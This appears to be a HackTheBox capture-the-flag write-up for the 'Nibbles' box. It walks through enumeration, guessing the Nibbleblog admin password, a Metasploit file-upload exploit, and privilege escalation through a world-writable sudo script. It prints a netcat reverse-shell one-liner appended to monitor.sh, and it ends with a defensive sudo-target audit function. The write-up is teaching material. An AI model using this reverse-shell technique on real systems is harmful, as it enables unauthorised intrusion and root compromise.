Writeup HTB Nibbles with Metasploit

Tech HTB Writeup
Author: ximnoise, Sysadmin & Security Engineer

Nibbles was my first write-up and my first pwned box on HackTheBox. Nibbles is one of the easier boxes. It hosts a vulnerable instance of Nibbleblog, and there is a Metasploit exploit for it that I use.

Enumeration

Nmap

From the initial nmap scan we can see that the host is likely running Ubuntu Linux and exposes an OpenSSH server (port 22) and an Apache web server (port 80).

nmap output

Port 80 recon

Browsing the target page shows a simple “Hello World!” message.

hello world page

After a quick check of the page source we see an interesting comment.

page source with comment

/nibbleblog

Browsing this site we find an empty instance of Nibbleblog (“Powered by Nibbleblog”).

nibbleblog main page

When we look up Nibbleblog for vulnerabilities we find a Metasploit module that works against version 4.0.3. At this point we don’t know the exact version of the Nibbleblog instance. The Metasploit module also needs user-supplied credentials to authenticate to the admin portal.

Gobuster

We can use gobuster to look for an admin portal. After a quick check gobuster confirms the presence of an admin panel under admin.php.

nibbleblog admin login page

We also see a README page with interesting information regarding the version number, which tells us that the Nibbleblog instance is vulnerable to the Metasploit module.

readme page with interesting information

Identifying Credentials

Exploring the discovered paths, we find /nibbleblog/content with directory listing enabled. Digging deeper, we find the page /nibbleblog/content/private/userx.xml, which reveals the username we need: admin.

page with user information

Logging into admin panel

I wasn’t able to find the admin password elsewhere on the page. So I tried nibbles as the password and luckily we are in.

nibbleblog admin panel logged in main page

Remote Code Execution

To get a reverse shell on the box we use the exploit/multi/http/nibbleblog_file_upload Metasploit module.

metasploit search for exploit

After setting the required options (rhosts, lhost, username, password, targeturi) we can exploit the Nibbleblog instance.

metasploit exploit with all options set

User Flag

After getting the reverse shell we can upgrade our shell and get the user.txt with the flag.

terminal output with the user flag

Root Flag

As the user we can check with sudo -l what we are allowed to run without a password.

terminal output from sudo -l

We can see that we are allowed to run monitor.sh via sudo, and that this script is also world-writable.

terminal output from monitor.sh with permissions

Because of that we can easily execute our reverse shell code from inside this file. Rather than overwriting the script, we append our code to the end:

    echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.3 8083 > /tmp/f" >> monitor.sh

and then execute the script with sudo.
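As an added example (not part of the writeup), a small POSIX shell audit that flags the conditions which made monitor.sh a path to root: a sudo target that is world- or group-writable, not owned by root, a symlink, or sitting in a world-writable directory. It assumes the script path is already known, for instance from the sudo -l output.

```shell
#!/bin/sh
# Defender-side audit for the misconfiguration behind the root flag above:
# a NOPASSWD sudo target that a non-root user can modify. Added example,
# not part of the original writeup. Usage: sudo_target_check /path/to/script
# Prints one finding per line; returns 0 when nothing is flagged.

sudo_target_check() {
    path=$1
    status=0

    if [ ! -e "$path" ]; then
        echo "MISSING $path: a user who can create it controls what sudo runs"
        return 1
    fi
    if [ -L "$path" ]; then
        echo "SYMLINK $path: sudo follows it, so the link target needs the same audit"
        status=1
    fi

    # `ls -ldn` is POSIX: field 1 is the mode string, field 3 the numeric uid.
    set -- $(ls -ldn "$path")
    mode=$1
    uid=$3

    # mode string layout: columns 2-4 owner, 5-7 group, 8-10 other (e.g. -rwxrwxrwx)
    case "$mode" in
        ????????w?) echo "WORLD-WRITABLE $path ($mode)"; status=1 ;;
    esac
    case "$mode" in
        ?????w????) echo "GROUP-WRITABLE $path ($mode)"; status=1 ;;
    esac
    if [ "$uid" != 0 ]; then
        echo "NOT-ROOT-OWNED $path (uid $uid): the owner can rewrite it at will"
        status=1
    fi

    # A writable parent directory lets the file be replaced wholesale, even if
    # the file's own mode is tight.
    dir=$(dirname "$path")
    set -- $(ls -ldn "$dir")
    case "$1" in
        ????????w?) echo "WORLD-WRITABLE-DIR $dir ($1)"; status=1 ;;
    esac
    return $status
}
```

Run it against every command listed in sudo -l (or in /etc/sudoers) on a host; any finding means the sudo rule grants more than it looks like it does.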

terminal output from monitor.sh after execute
terminal output from netcat with root access

Now we can easily grab the root flag.

terminal output with the user flag